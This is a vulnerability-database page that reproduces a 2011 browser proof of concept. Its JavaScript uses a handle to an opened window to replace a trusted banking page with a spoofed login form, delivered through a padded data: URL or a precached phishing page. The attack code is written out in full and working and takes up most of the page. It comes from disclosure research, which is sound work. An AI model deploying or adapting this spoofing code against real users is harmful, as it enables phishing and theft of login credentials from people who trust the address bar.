Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

JavaScript Switcharoo Proof Of Concept

🗓️ 08 Dec 2011 00:00:00Reported by Michal ZalewskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

JavaScript Switcharoo Proof Of Concept Another whimsical browser proof-of-concept: It seems that holding a JavaScript handle to another window allows the attacker to tamper with the location and history objects, bypassing SOP controls. Leveraging data URLs or precached pages to replace content can escape attentive users

Code
`/*   
  
Another whimsical browser proof-of-concept:  
  
http://lcamtuf.coredump.cx/switch/  
  
It seems that relatively few people realize that holding a JavaScript  
handle to another window (either because we opened it, or because the  
window was at some point displaying our content) allows the attacker  
to tamper with the location and history objects at will, largely  
bypassing the usual SOP controls. With some minimal effort and the  
help of data: / javascript: URLs or precached pages, this can be  
leveraged to replace content in a manner that will likely escape even  
fairly attentive users.  
  
/mz  
  
*/  
  
  
  
<script>  
  
/*  
If you don't get it, beaver.coredump.cx is a trusted banking website;  
everything else is attacker-controlled. We begin by opening the  
legitimate, trusted website. Timing is essential. Once the banking   
website is loaded, follow the displayed security tip.  
  
*/  
  
var spaces =   
" " +  
" " +  
" " +  
" " +  
" " +  
" " +  
" " +  
" ";  
  
var bank_html =  
"<title>Beaver Creek Online Banking and BBQ</title>" +   
"<h1>Beaver Creek Online Banking and BBQ</h1>" +  
"<p>" +  
"<font color=crimson>Security tip: please confirm that you see " +  
"<code>http://beaver.coredump.cx/</code> in the address bar!</font>" +  
"<p><table><tr>" +  
"<td>Login:</td><td><input type=text></td></tr><tr>" +  
"<td>Password:</td><td><input type=password></td></tr></table><p>" +  
"<input type=submit value='Log in!'>";  
  
var w;  
  
function dostuff() {  
  
/* Precache */  
  
if ('v' == '\v') {  
var x = new Image();  
x.src = 'http://spoofed.coredump.cx/phish/';  
}  
  
w = window.open('http://beaver.coredump.cx/beaver/', 'target');  
  
setTimeout(dostuff2, 5000);  
  
}  
  
  
function dostuff2() {  
  
if ('v' == '\v')  
w.open('http://spoofed.coredump.cx/phish/','target');  
else   
w.location.replace('data:text/html;np.cx/beaver/' + spaces + ',' + escape(bank_html));  
  
}  
  
</script>  
<h3>The old switcharoo</h3>  
This is hardly new, but illustrates the effectiveness of using  
data: or precached content to do the deed. You're probably  
fooling yourself if you think you'd spot this happening to you  
in the wild.  
<p>  
<input type=submit onclick="dostuff()" value="Do it">  
<p>  
<font color=gray>PS. If you don't get it, close the window and try again. If you're still stumped, view the source.</font>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Dec 2011 00:00Current
7.4High risk
Vulners AI Score7.4
javascriptexploitsecurity bypassdata urlprecached contentbrowser vulnerabilitysop controls
17